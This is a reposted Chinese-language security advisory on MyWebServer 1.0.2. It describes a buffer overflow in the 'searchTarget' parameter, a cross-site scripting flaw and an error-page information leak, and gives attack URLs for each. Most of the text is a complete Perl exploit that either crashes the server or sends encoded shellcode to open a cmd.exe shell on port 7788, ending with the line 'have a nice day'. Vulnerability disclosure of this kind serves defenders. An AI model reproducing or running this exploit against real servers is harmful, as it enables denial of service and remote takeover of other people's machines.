MyWebServer 的缓冲溢出/跨站脚本执行/信息泄露缺陷 (MS,补丁)

/ns/ld/softld/data/20020820025336.htm

转帖




MyWebServer 的缓冲溢出/跨站脚本执行/信息泄露缺陷 (MS,补丁)

涉及程序：
MyWebServer

描述：
MyWebServer 的缓冲溢出/跨站脚本执行/信息泄露缺陷

详细：
MyWebServer是一款小型的WEB服务程序，可使用在Microsoft windows操作系统下。

MyWebServer存在多个缺陷，远程攻击者可以利用这些缺陷进行缓冲区溢出，跨站脚本执行和信息泄露攻击。

MyWebServer包含多个漏洞：

1. 由于MyWebServer的MWS搜索引擎对用户提交的给'searchTarget='变量的数据缺少正确的边界缓冲检查，远程攻击者可以提交超长字符数据给'searchTarget='变量，当MyWebServer的MWS搜索引擎处理时导致缓冲溢出，随机数据可导致WEB服务崩溃，精心构建的数据可以以WEB进程权限执行任意代码。

2，MyWebServer对用户提交的数据缺少过滤，攻击者可以构建包含恶意脚本代码或者HTML，JS代码的链接，当用户浏览这个链接时，恶意代码可以在用户浏览器上执行，导致用户基于认证的COOKIE信息泄露。

3，直接向MyWebServer请求不存在的目录，可导致MyWebServer返回包含补丁信息的错误页面。


受影响系统：
MyWebServer 1.0.2


攻击方法：
缓冲区溢出：

http://vuln_host/MWS/HandleSearch.html?searchTarget=[990b_of_any_data]&B1=Submit

跨站脚本执行攻击：

http://vuln_host/[223b_of_any_data]<font%20size=50>DEFACED<!--//--

补丁信息泄露：

http://vuln_host/[not_exists_dir]


D4rkGr3y（grey_1999@mail.ru） 提供了如下测试程序：

#!/usr/bin/perl
###############################################
# Remote MWS DoS/root exploit
#Vulnerable: MyWebServer v.1.0.2 and lower
#Support: www.mywebserver.org
#Bug: buffer overflow in get-requests.
#Usage: perl mws.pl [-d or -r] [host] [port]
#-d - DoS (100% work)
#-r - DoS and running shellcode
#Possibe some problems with it... if shellcode
#doesn't work correctly, try another one.
#Buffer size 989b.
#Author: D4rkGr3y
###############################################
use IO::Socket;
$shellcode = "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xeb\x03\x5d\xeb\x05\xe8 \
\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x \
97\x40\xe2\xfa\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36\x97\x97 \
\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97\x97\x77\xe0\x7f\x4b\x96\x97\x \
97\x16\x6c\x97\x97\x68\x28\x98\x14\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac \
\xda\xcd\xe2\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14\x57\xef\x \
1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5\xd9\xe2\x52\x16\xee\x93\xd2\xdb \
\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\x \
e2\x9e\x16\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68\x94\x6c\x1c \
\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x \
94\x5e\x94\x5e\x94\xd9\x8b\x94\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c \
\x40\xa4\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68\x85\xcd\x1e\x \
d5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99 \
\x13\x5e\xe3\x9e\xc5\xc1\xc4\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x \
4f\xa4\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5\xc1\xc4\x68\x85 \
\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x \
7b\xfd\x95\xc4\x68\xc0\x67\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0 \
\xc1\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf\x27\xd3\x1e\x90\x \
c0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57 \
\xf1\x2f\x96\x96\x1e\xd0\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\x \
a4\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0\x5b\xdf\xc7\xc7\xc4 \
\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x \
1c\x5f\x22\x93\xc7\xc7\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57 \
\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4\x57\xc7\x68\xa0\xc1\x \
c4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b \
\xc0\xa4\x5e\xc6\xc7\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68\x \
c0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f\x97\x97\x97\x50\x97\xef \
\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\x \
e0\xb4\x17\x70\xe0\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5\xd9 \
\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2\x97\xd0\xf2\xe3\xc4\xe3\x \
f6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2 \
\xe4\xe4\xd6\x97\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc\xd9\x \
f6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb\xd6\xfb\xfb\xf8\xf4\x97\xc0 \
\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\x \
f2\xe7\x97\xd2\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4\xdc\xa4 \
\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97\xfb\xfe\xe4\xe3\xf2\xf9\x97\x \
f6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97 \
\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97\x68\x68\x \
68\x68"; $dos = "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; $param = \
$ARGV[0]; $host = $ARGV[1];
$port = $ARGV[2];
print "\n\n";
print "[DamageHackingGroup|www.dhgroup.org]\n";
print "#MyWebServer v.1.0.2 - www.mywebserver.org\n";
print "#Remote DoS/root xsploit (opens cmd.exe shell on port 7788)\n";
print "#Shellcode writen by isno\n";
if (defined $param && defined $host && defined $port) {
if ($param eq "-d") {
DoS();
} else {
get_root();
}
} else {
print "Error in Params.\n";
print "Usage: perl mws.pl [-d or -r] [host] [port]\n";
print "-d - kill web server\n";
die "-r - open shell on port 7788 (only ME/XP)\n";
}

sub DoS {
print "Connecting to '$host' ... ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => \
"tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
print "Connected.\n";
print "Attacking target ... ";
print $socket "GET $dos HTTP/1.0\n\n";
print "Complete.\n";
print "$host is dead.\n";
close($socket);
return;
}

sub get_root {
print "Connecting to '$host' ...";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => \
"tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
print "Connected.\n";
print "Running shellcode ... ";
print $socket "GET $shellcode HTTP/1.0\n\n";
print "Complete.\n";
print "Now type 'telnet $host 7788' and have a nice day :)\n";
close($socket);
return;
}



解决方案：
厂商目前还没有提供补丁或者升级程序，建议用户暂时使用其它web server软件或随时关注厂商的主页以获取最新版本：

http://www.mywebserver.org